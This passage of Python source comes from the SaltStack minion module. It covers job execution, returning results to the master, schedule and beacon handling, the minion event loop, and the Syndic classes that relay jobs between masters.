opts['multiprocessing'] and \
not salt.log.setup.is_logging_configured():
# We have to re-init the logging system for Windows
salt.log.setup.setup_console_logger(log_level=opts.get('log_level', 'info'))
if opts.get('log_file'):
salt.log.setup.setup_logfile_logger(opts['log_file'], opts.get('log_level_logfile', 'info'))
if not minion_instance:
minion_instance = cls(opts)
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules()
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
executors = data.get('module_executors') or opts.get('module_executors', ['direct_call.get'])
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo.get':
if executors[-1] in FUNCTION_EXECUTORS:
executors[-1] = 'sudo.get' # replace
else:
executors.append('sudo.get') # append
log.trace('Executors list {0}'.format(executors)) # pylint: disable=no-member
# Get executors
def get_executor(name):
executor_class = minion_instance.executors.get(name)
if executor_class is None:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return executor_class
# Get the last one that is function executor
executor = get_executor(executors.pop())(opts, data, func, args, kwargs)
# Instantiate others from bottom to the top
for executor_name in reversed(executors):
executor = get_executor(executor_name)(opts, data, executor)
return_data = executor.execute()
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in \'{0}\' had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing \'{0}\': {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(function_name, exc, func.__doc__, )
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if sys.platform.startswith('win') and \
opts['multiprocessing'] and \
                not salt.log.setup.is_logging_configured():
            # We have to re-init the logging system for Windows
            salt.log.setup.setup_console_logger(log_level=opts.get('log_level', 'info'))
            if opts.get('log_file'):
                salt.log.setup.setup_logfile_logger(opts['log_file'], opts.get('log_level_logfile', 'info'))
if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
channel = salt.transport.Channel.factory(self.opts)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
            with salt.utils.fopen(fn_, 'w+b') as fp_:
                fp_.write(self.serial.dumps(ret))
try:
ret_val = channel.send(load, timeout=timeout)
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warn(msg)
return ''
log.trace('ret_val = {0}'.format(ret_val)) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
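        # A hedged config sketch (minion YAML); tune_in() passes the value to
        # this method in minutes, and any non-zero value enables the watcher:
        #
        #   grains_refresh_every: 5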
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
if hasattr(self, 'proxy'):
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh,
notify=notify,
proxy=self.proxy) # pylint: disable=no-member
else:
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist, where)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist, where)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons()
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def clean_die(self, signum, frame):
'''
        Python does not handle SIGTERM cleanly; if it is signalled, exit
        the minion process cleanly
'''
self._running = False
exit(0)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug('Handling event tag \'{0}\''.format(tag))
if package.startswith('module_refresh'):
self.module_refresh(notify=data.get('notify', False))
elif package.startswith('pillar_refresh'):
yield self.pillar_refresh()
elif package.startswith('manage_schedule'):
self.manage_schedule(tag, data)
elif package.startswith('manage_beacons'):
self.manage_beacons(tag, data)
elif package.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
                yield self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif package.startswith('environ_setenv'):
self.environ_setenv(tag, data)
elif package.startswith('_minion_mine'):
self._mine_send(tag, data)
elif package.startswith('fire_master'):
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif package.startswith('__master_disconnected'):
tag, data = salt.utils.event.MinionEvent.unpack(tag, data)
# if the master disconnect event is for a different master, raise an exception
if data['master'] != self.opts['master']:
raise Exception()
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
self.opts['master'] = self.eval_master(opts=self.opts,
failed=True)
if self.connected:
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
del self.pub_channel
self._connect_master_future = self.connect_master()
self.block_until_connected() # TODO: remove # pylint: disable=no-member
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('__master_connected'):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('_salt_error'):
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
        :rtype: None
'''
self._pre_tune()
# Properly exit if a SIGTERM is signalled
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No SIGTERM installed, install ours
signal.signal(signal.SIGTERM, self.clean_die)
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
self.handle_event,
io_loop=self.io_loop,
)
log.debug('Minion \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = self.opts['loop_interval']
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
self.periodic_callbacks = {}
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0:
def ping_master():
if not self._fire_master('ping', 'minion_ping'):
if not self.opts.get('auth_safemode', True):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay {0}s'.format(delay))
# regular sys.exit raises an exception -- which isn't sufficient in a thread
os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
def handle_beacons():
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
            except Exception:
                log.critical('The beacon errored: ', exc_info=True)
                beacons = None
if beacons:
self._fire_master(events=beacons)
self.periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
self.periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(self.periodic_callbacks):
periodic_cb.start()
# add handler to subscriber
self.pub_channel.on_recv(self._handle_payload)
if start:
self.io_loop.start()
def _handle_payload(self, payload):
if payload is not None and self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
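        # An illustrative (hypothetical) publication load, for reference only:
        #
        #   {'tgt': 'web*', 'tgt_type': 'glob', 'jid': '20170101000000000000',
        #    'fun': 'test.ping', 'arg': []}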
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
    Make a Syndic minion; this minion will use the minion keys on the
    master to authenticate with a higher-level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
        # force auth_safemode True because the Syndic doesn't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
try:
# Send out the publication
self.local.pub(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
**kwargs)
except Exception as exc:
log.warning('Unable to forward pub data: {0}'.format(exc))
def _fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start'
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
)
# Syndic Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
# Properly exit if a SIGTERM is signalled
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No SIGTERM installed, install ours
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Syndic \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Send an event to the master that the minion is live
self._fire_master_syndic_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
if start:
self.io_loop.start()
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None:
log.trace('Handling payload') # pylint: disable=no-member
self._handle_decoded_payload(payload['load'])
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag'])) # pylint: disable=no-member
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
self._fire_master(events=self.raw_events,
pretag=tagify(self.opts['id'], base='syndic'),
)
for jid in self.jids:
self._return_pub(self.jids[jid],
'_syndic_return',
timeout=self._return_retry_timer())
self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
        # We borrowed the local client's poller, so give it back before
        # it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: consolidate syndic classes together?
# need a way of knowing if the syndic connection is busted
class MultiSyndic(MinionBase):
'''
Make a MultiSyndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
    Modes (controlled by `syndic_mode`):
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
    In addition, since these classes all seem to use a mix of blocking and non-blocking
    calls (with varying timeouts along the way), this daemon does not handle failure well;
    it will (under most circumstances) stall the daemon for ~15s trying to forward events
    to the down master
'''
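    # A hedged config sketch for the syndic's minion config (YAML); hostnames
    # are illustrative:
    #
    #   master:
    #     - master-of-masters-1.example.com
    #     - master-of-masters-2.example.com
    #   syndic_mode: sync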
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(MultiSyndic, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
zmq.eventloop.ioloop.install()
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
self.io_loop = io_loop
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = {} # mapping of opts['master'] -> syndic
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master()
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
log.info('Syndic successfully connected to {0}'.format(opts['master']))
break
except SaltClientError as exc:
log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
        # if it's connected, mark it dead
if self._syndics[master].done():
            syndic = self._syndics[master].result()
syndic.destroy()
self._syndics[master] = self._connect_syndic(syndic.opts)
else:
log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug?
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
                log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master))
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
return
except SaltClientError:
                log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
self._mark_master_dead(master)
continue
